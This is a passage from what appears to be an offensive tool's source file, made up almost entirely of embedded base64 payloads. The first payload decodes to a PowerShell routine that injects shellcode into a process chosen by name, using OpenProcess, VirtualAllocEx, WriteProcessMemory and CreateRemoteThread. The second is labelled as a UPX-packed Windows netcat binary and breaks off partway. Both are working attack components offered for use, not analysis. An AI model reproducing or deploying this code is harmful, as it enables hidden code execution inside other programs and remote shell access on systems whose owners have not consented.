gICAgICAgICAgICRMaXR0bGVFbmRpYW5CeXRlQXJyYXkgPSBOZXctT2JqZWN0IEJ5dGVbXSgwKQogICAgICAgICAgICAkQWRkcmVzcy5Ub1N0cmluZygiWCQoJEludFNpemVQdHIqMikiKSAtc3BsaXQgJyhbQS1GMC05XXsyfSknIHwgRm9yRWFjaC1PYmplY3QgeyBpZiAoJF8pIHsgJExpdHRsZUVuZGlhbkJ5dGVBcnJheSArPSBbQnl0ZV0gKCcweHswfScgLWYgJF8pIH0gfQogICAgICAgICAgICBbU3lzdGVtLkFycmF5XTo6UmV2ZXJzZSgkTGl0dGxlRW5kaWFuQnl0ZUFycmF5KQogICAgICAgICAgICAKICAgICAgICAgICAgV3JpdGUtT3V0cHV0ICRMaXR0bGVFbmRpYW5CeXRlQXJyYXkKICAgICAgICB9CiAgICAgICAgCiAgICAgICAgJENhbGxTdHViID0gTmV3LU9iamVjdCBCeXRlW10oMCkKICAgICAgICAKICAgICAgICBpZiAoJEludFNpemVQdHIgLWVxIDgpCiAgICAgICAgewogICAgICAgICAgICBbQnl0ZVtdXSAkQ2FsbFN0dWIgPSAweDQ4LDB4QjggICAgICAgICAgICAgICAgICAgICAgIyBNT1YgICBRV09SRCBSQVgsICZzaGVsbGNvZGUKICAgICAgICAgICAgJENhbGxTdHViICs9IENvbnZlcnRUby1MaXR0bGVFbmRpYW4gJEJhc2VBZGRyICAgICAgICMgJnNoZWxsY29kZQogICAgICAgICAgICAkQ2FsbFN0dWIgKz0gMHhGRiwweEQwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBDQUxMICBSQVgKICAgICAgICAgICAgJENhbGxTdHViICs9IDB4NkEsMHgwMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMgUFVTSCAgQllURSAwCiAgICAgICAgICAgICRDYWxsU3R1YiArPSAweDQ4LDB4QjggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjIE1PViAgIFFXT1JEIFJBWCwgJkV4aXRUaHJlYWQKICAgICAgICAgICAgJENhbGxTdHViICs9IENvbnZlcnRUby1MaXR0bGVFbmRpYW4gJEV4aXRUaHJlYWRBZGRyICMgJkV4aXRUaHJlYWQKICAgICAgICAgICAgJENhbGxTdHViICs9IDB4RkYsMHhEMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMgQ0FMTCAgUkFYCiAgICAgICAgfQogICAgICAgIGVsc2UKICAgICAgICB7CiAgICAgICAgICAgIFtCeXRlW11dICRDYWxsU3R1YiA9IDB4QjggICAgICAgICAgICAgICAgICAgICAgICAgICAjIE1PViAgIERXT1JEIEVBWCwgJnNoZWxsY29kZQogICAgICAgICAgICAkQ2FsbFN0dWIgKz0gQ29udmVydFRvLUxpdHRsZUVuZGlhbiAkQmFzZUFkZHIgICAgICAgIyAmc2hlbGxjb2RlCiAgICAgICAgICAgICRDYWxsU3R1YiArPSAweEZGLDB4RDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjIENBTEwgIEVBWAogICAgICAgICAgICAkQ2FsbFN0dWIgKz0gMHg2QSwweDAwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBQVVNIICBCWVRFIDAKICAgICAgICAgICAgJENhbGxTdHViICs9IDB4QjggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMgTU9WICAgRFdPUkQgRUFYLCAmRXhpdFRocmVhZAogICAgICAgICAgICAkQ2FsbFN0dWIgKz0gQ29udmVydFRvLUxpdHRsZUVuZGlhbiAkRXhpdFRocmVhZEFkZHIgIyAmRXhpdFRocmVhZAogICAgICAgICAgICAkQ2FsbFN0dWIgKz0gMHhGRiwweEQwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBDQUxMICBFQVgKICAgICAgICB9CiAgICAgICAgCiAgICAgICAgV3JpdGUtT3V0cHV0ICRDYWxsU3R1YgogICAgfQoKCgpmdW5jdGlvbiBMb2NhbDpHZXQtUHJvY0FkZHJlc3MKICAgIHsKICAgICAgICBQYXJhbQogICAgICAgICgKICAgICAgICAgICAgW091dHB1dFR5cGUoW0ludFB0cl0pXQogICAgICAgIAogICAgICAgICAgICBbUGFyYW1ldGVyKCBQb3NpdGlvbiA9IDAsIE1hbmRhdG9yeSA9ICRUcnVlICldCiAgICAgICAgICAgIFtTdHJpbmddCiAgICAgICAgICAgICRNb2R1bGUsCiAgICAgICAgICAgIAogICAgICAgICAgICBbUGFyYW1ldGVyKCBQb3NpdGlvbiA9IDEsIE1hbmRhdG9yeSA9ICRUcnVlICldCiAgICAgICAgICAgIFtTdHJpbmddCiAgICAgICAgICAgICRQcm9jZWR1cmUKICAgICAgICApCgogICAgICAgICMgR2V0IGEgcmVmZXJlbmNlIHRvIFN5c3RlbS5kbGwgaW4gdGhlIEdBQwogICAgICAgICRTeXN0ZW1Bc3NlbWJseSA9IFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8CiAgICAgICAgICAgIFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfQogICAgICAgICRVbnNhZmVOYXRpdmVNZXRob2RzID0gJFN5c3RlbUFzc2VtYmx5LkdldFR5cGUoJ01pY3Jvc29mdC5XaW4zMi5VbnNhZmVOYXRpdmVNZXRob2RzJykKICAgICAgICAjIEdldCBhIHJlZmVyZW5jZSB0byB0aGUgR2V0TW9kdWxlSGFuZGxlIGFuZCBHZXRQcm9jQWRkcmVzcyBtZXRob2RzCiAgICAgICAgJEdldE1vZHVsZUhhbmRsZSA9ICRVbnNhZmVOYXRpdmVNZXRob2RzLkdldE1ldGhvZCgnR2V0TW9kdWxlSGFuZGxlJykKICAgICAgICAkR2V0UHJvY0FkZHJlc3MgPSAkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoJ0dldFByb2NBZGRyZXNzJykKICAgICAgICAjIEdldCBhIGhhbmRsZSB0byB0aGUgbW9kdWxlIHNwZWNpZmllZAogICAgICAgICRLZXJuMzJIYW5kbGUgPSAkR2V0TW9kdWxlSGFuZGxlLkludm9rZSgkbnVsbCwgQCgkTW9kdWxlKSkKICAgICAgICAkdG1wUHRyID0gTmV3LU9iamVjdCBJbnRQdHIKICAgICAgICAkSGFuZGxlUmVmID0gTmV3LU9iamVjdCBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmKCR0bXBQdHIsICRLZXJuMzJIYW5kbGUpCiAgICAgICAgCiAgICAgICAgIyBSZXR1cm4gdGhlIGFkZHJlc3Mgb2YgdGhlIGZ1bmN0aW9uCiAgICAgICAgV3JpdGUtT3V0cHV0ICRHZXRQcm9jQWRkcmVzcy5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdJEhhbmRsZVJlZiwgJFByb2NlZHVyZSkpCiAgICB9CgoKJElzV293NjRQcm9jZXNzQWRkciA9IEdldC1Qcm9jQWRkcmVzcyBrZXJuZWwzMi5kbGwgSXNXb3c2NFByb2Nlc3MKaWYgKCRJc1dvdzY0UHJvY2Vzc0FkZHIpCiAgICB7CiAgICAgICAgJElzV293NjRQcm9jZXNzRGVsZWdhdGUgPSBHZXQtRGVsZWdhdGVUeXBlIEAoW0ludFB0cl0sIFtCb29sXS5NYWtlQnlSZWZUeXBlKCkpIChbQm9vbF0pCiAgICAgICAgJElzV293NjRQcm9jZXNzID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoJElzV293NjRQcm9jZXNzQWRkciwgJElzV293NjRQcm9jZXNzRGVsZWdhdGUpCiAgICAgICAgCiAgICAgICAgJDY0Yml0Q1BVID0gJHRydWUKICAgIH0KICAgIGVsc2UKICAgIHsKICAgICAgICAkNjRiaXRDUFUgPSAkZmFsc2UKICAgIH0KCiAgICBpZiAoW0ludFB0cl06OlNpemUgLWVxIDQpCiAgICB7CiAgICAgICAgJFBvd2VyU2hlbGwzMmJpdCA9ICR0cnVlCiAgICB9CiAgICBlbHNlCiAgICB7CiAgICAgICAgJFBvd2VyU2hlbGwzMmJpdCA9ICRmYWxzZQogICAgfQoKCiRTaGVsbGNvZGUgPSBTSEVMTENPREVIRVJFCltCeXRlW11dICRTaGVsbGNvZGUzMiA9ICRTaGVsbGNvZGUKW0J5dGVbXV0gJFNoZWxsY29kZTY0ID0gJFNoZWxsY29kZTMyCiRQcm9jZXNzSWQ9R2V0LVByb2Nlc3MgLU5hbWUgJypQUk9DRVNTTkFNRSonIHwgU2VsZWN0IC1FeHBhbmQgSWQKCiMgSW5qZWN0IHNoZWxsY29kZSBpbnRvIHRoZSBzcGVjaWZpZWQgcHJvY2VzcyBJRAokT3BlblByb2Nlc3NBZGRyID0gR2V0LVByb2NBZGRyZXNzIGtlcm5lbDMyLmRsbCBPcGVuUHJvY2VzcwokT3BlblByb2Nlc3NEZWxlZ2F0ZSA9IEdldC1EZWxlZ2F0ZVR5cGUgQChbVUludDMyXSwgW0Jvb2xdLCBbVUludDMyXSkgKFtJbnRQdHJdKQokT3BlblByb2Nlc3MgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigkT3BlblByb2Nlc3NBZGRyLCAkT3BlblByb2Nlc3NEZWxlZ2F0ZSkKJFZpcnR1YWxBbGxvY0V4QWRkciA9IEdldC1Qcm9jQWRkcmVzcyBrZXJuZWwzMi5kbGwgVmlydHVhbEFsbG9jRXgKJFZpcnR1YWxBbGxvY0V4RGVsZWdhdGUgPSBHZXQtRGVsZWdhdGVUeXBlIEAoW0ludFB0cl0sIFtJbnRQdHJdLCBbVWludDMyXSwgW1VJbnQzMl0sIFtVSW50MzJdKSAoW0ludFB0cl0pCiRWaXJ0dWFsQWxsb2NFeCA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKCRWaXJ0dWFsQWxsb2NFeEFkZHIsICRWaXJ0dWFsQWxsb2NFeERlbGVnYXRlKQokV3JpdGVQcm9jZXNzTWVtb3J5QWRkciA9IEdldC1Qcm9jQWRkcmVzcyBrZXJuZWwzMi5kbGwgV3JpdGVQcm9jZXNzTWVtb3J5CiRXcml0ZVByb2Nlc3NNZW1vcnlEZWxlZ2F0ZSA9IEdldC1EZWxlZ2F0ZVR5cGUgQChbSW50UHRyXSwgW0ludFB0cl0sIFtCeXRlW11dLCBbVUludDMyXSwgW1VJbnQzMl0uTWFrZUJ5UmVmVHlwZSgpKSAoW0Jvb2xdKQokV3JpdGVQcm9jZXNzTWVtb3J5ID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoJFdyaXRlUHJvY2Vzc01lbW9yeUFkZHIsICRXcml0ZVByb2Nlc3NNZW1vcnlEZWxlZ2F0ZSkKJENyZWF0ZVJlbW90ZVRocmVhZEFkZHIgPSBHZXQtUHJvY0FkZHJlc3Mga2VybmVsMzIuZGxsIENyZWF0ZVJlbW90ZVRocmVhZAokQ3JlYXRlUmVtb3RlVGhyZWFkRGVsZWdhdGUgPSBHZXQtRGVsZWdhdGVUeXBlIEAoW0ludFB0cl0sIFtJbnRQdHJdLCBbVUludDMyXSwgW0ludFB0cl0sIFtJbnRQdHJdLCBbVUludDMyXSwgW0ludFB0cl0pIChbSW50UHRyXSkKJENyZWF0ZVJlbW90ZVRocmVhZCA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKCRDcmVhdGVSZW1vdGVUaHJlYWRBZGRyLCAkQ3JlYXRlUmVtb3RlVGhyZWFkRGVsZWdhdGUpCiRDbG9zZUhhbmRsZUFkZHIgPSBHZXQtUHJvY0FkZHJlc3Mga2VybmVsMzIuZGxsIENsb3NlSGFuZGxlCiRDbG9zZUhhbmRsZURlbGVnYXRlID0gR2V0LURlbGVnYXRlVHlwZSBAKFtJbnRQdHJdKSAoW0Jvb2xdKQokQ2xvc2VIYW5kbGUgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigkQ2xvc2VIYW5kbGVBZGRyLCAkQ2xvc2VIYW5kbGVEZWxlZ2F0ZSkKCldyaXRlLVZlcmJvc2UgIkluamVjdGluZyBzaGVsbGNvZGUgaW50byBQSUQ6ICRQcm9jZXNzSWQiCgoKCiRoUHJvY2VzcyA9ICRPcGVuUHJvY2Vzcy5JbnZva2UoMHgwMDFGMEZGRiwgJGZhbHNlLCAkUHJvY2Vzc0lEKSAjIFByb2Nlc3NBY2Nlc3NGbGFncy5BbGwgKDB4MDAxRjBGRkYpCldyaXRlLWhvc3QgJGhQcm9jZXNzOwppZiAoISRoUHJvY2VzcykKICAgICAgICB7CiAgICAgICAgICAgIFRocm93ICJVbmFibGUgdG8gb3BlbiBhIHByb2Nlc3MgaGFuZGxlIGZvciBQSUQ6ICRQcm9jZXNzSUQiCiAgICAgICAgfQokUmVtb3RlTWVtQWRkciA9ICRWaXJ0dWFsQWxsb2NFeC5JbnZva2UoJGhQcm9jZXNzLCBbSW50UHRyXTo6WmVybywgJFNoZWxsY29kZS5MZW5ndGggKyAxLCAweDMwMDAsIDB4NDApCmlmICghJFJlbW90ZU1lbUFkZHIpCiAgICAgICAgewogICAgICAgICAgICBUaHJvdyAiVW5hYmxlIHRvIGFsbG9jYXRlIHNoZWxsY29kZSBtZW1vcnkgaW4gUElEOiAkUHJvY2Vzc0lEIgogICAgICAgIH0KCldyaXRlLUhvc3QgIlNoZWxsY29kZSBtZW1vcnkgcmVzZXJ2ZWQgYXQgMHgkKCRSZW1vdGVNZW1BZGRyLlRvU3RyaW5nKCJYJChbSW50UHRyXTo6U2l6ZSoyKSIpKSIKCgokV3JpdGVQcm9jZXNzTWVtb3J5Lkludm9rZSgkaFByb2Nlc3MsICRSZW1vdGVNZW1BZGRyLCAkU2hlbGxjb2RlLCAkU2hlbGxjb2RlLkxlbmd0aCwgW1JlZl0gMCkgfCBPdXQtTnVsbAoKIyBHZXQgYWRkcmVzcyBvZiBFeGl0VGhyZWFkIGZ1bmN0aW9uCiRFeGl0VGhyZWFkQWRkciA9IEdldC1Qcm9jQWRkcmVzcyBrZXJuZWwzMi5kbGwgRXhpdFRocmVhZAoKaWYgKCRJc1dvdzY0KQogICAgICAgIHsKICAgICAgICAgICAgIyBCdWlsZCAzMi1iaXQgaW5saW5lIGFzc2VtYmx5IHN0dWIgdG8gY2FsbCB0aGUgc2hlbGxjb2RlIHVwb24gY3JlYXRpb24gb2YgYSByZW1vdGUgdGhyZWFkLgogICAgICAgICAgICAkQ2FsbFN0dWIgPSBFbWl0LUNhbGxUaHJlYWRTdHViICRSZW1vdGVNZW1BZGRyICRFeGl0VGhyZWFkQWRkciAzMgogICAgICAgICAgICBXcml0ZS1Ib3N0ICIzMi1iaXQiOyAgIAogICAgICAgICAgICBXcml0ZS1WZXJib3NlICdFbWl0dGluZyAzMi1iaXQgYXNzZW1ibHkgY2FsbCBzdHViLicKICAgICAgICB9CiAgICAgICAgZWxzZQogICAgICAgIHsKICAgICAgICAgICAgIyBCdWlsZCA2NC1iaXQgaW5saW5lIGFzc2VtYmx5IHN0dWIgdG8gY2FsbCB0aGUgc2hlbGxjb2RlIHVwb24gY3JlYXRpb24gb2YgYSByZW1vdGUgdGhyZWFkLgogICAgICAgICAgICAkQ2FsbFN0dWIgPSBFbWl0LUNhbGxUaHJlYWRTdHViICRSZW1vdGVNZW1BZGRyICRFeGl0VGhyZWFkQWRkciA2NAoJICAgIFdyaXRlLUhvc3QgIjY0LWJpdCIgICAgICAgICAgICAKICAgICAgICAgICAgV3JpdGUtVmVyYm9zZSAnRW1pdHRpbmcgNjQtYml0IGFzc2VtYmx5IGNhbGwgc3R1Yi4nCiAgICAgICAgfQoKCiRSZW1vdGVTdHViQWRkciA9ICRWaXJ0dWFsQWxsb2NFeC5JbnZva2UoJGhQcm9jZXNzLCBbSW50UHRyXTo6WmVybywgJENhbGxTdHViLkxlbmd0aCwgMHgzMDAwLCAweDQwKSAjIChSZXNlcnZlfENvbW1pdCwgUldYKQogICAgICAgIAogICAgICAgIGlmICghJFJlbW90ZVN0dWJBZGRyKQogICAgICAgIHsKICAgICAgICAgICAgVGhyb3cgIlVuYWJsZSB0byBhbGxvY2F0ZSB0aHJlYWQgY2FsbCBzdHViIG1lbW9yeSBpbiBQSUQ6ICRQcm9jZXNzSUQiCiAgICAgICAgfQogICAgICAgIAogICAgICAgIFdyaXRlLVZlcmJvc2UgIlRocmVhZCBjYWxsIHN0dWIgbWVtb3J5IHJlc2VydmVkIGF0IDB4JCgkUmVtb3RlU3R1YkFkZHIuVG9TdHJpbmcoIlgkKFtJbnRQdHJdOjpTaXplKjIpIikpIgoKICAgICAgICAjIFdyaXRlIDMyLWJpdCBhc3NlbWJseSBzdHViIHRvIHJlbW90ZSBwcm9jZXNzIG1lbW9yeSBzcGFjZQogICAgICAgICRXcml0ZVByb2Nlc3NNZW1vcnkuSW52b2tlKCRoUHJvY2VzcywgJFJlbW90ZVN0dWJBZGRyLCAkQ2FsbFN0dWIsICRDYWxsU3R1Yi5MZW5ndGgsIFtSZWZdIDApIHwgT3V0LU51bGwKCiAjIEV4ZWN1dGUgc2hlbGxjb2RlIGFzIGEgcmVtb3RlIHRocmVhZAogICAgICAgICRUaHJlYWRIYW5kbGUgPSAkQ3JlYXRlUmVtb3RlVGhyZWFkLkludm9rZSgkaFByb2Nlc3MsIFtJbnRQdHJdOjpaZXJvLCAwLCAkUmVtb3RlU3R1YkFkZHIsICRSZW1vdGVNZW1BZGRyLCAwLCBbSW50UHRyXTo6WmVybykKICAgICAgICAKICAgICAgICBpZiAoISRUaHJlYWRIYW5kbGUpCiAgICAgICAgewogICAgICAgICAgICBUaHJvdyAiVW5hYmxlIHRvIGxhdW5jaCByZW1vdGUgdGhyZWFkIGluIFBJRDogJFByb2Nlc3NJRCIKICAgICAgICB9CgogICAgICAgICMgQ2xvc2UgcHJvY2VzcyBoYW5kbGUKICAgICAgICAkQ2xvc2VIYW5kbGUuSW52b2tlKCRoUHJvY2VzcykgfCBPdXQtTnVsbAoKICAgICAgICBXcml0ZS1WZXJib3NlICdTaGVsbGNvZGUgaW5qZWN0aW9uIGNvbXBsZXRlIScKV3JpdGUtSG9zdCAiemMwMGwiOwoJCg==""" # netcat compiled for windows, upx -9 packed. 23 kb -# 64bit -WINDOWS_NCAT = """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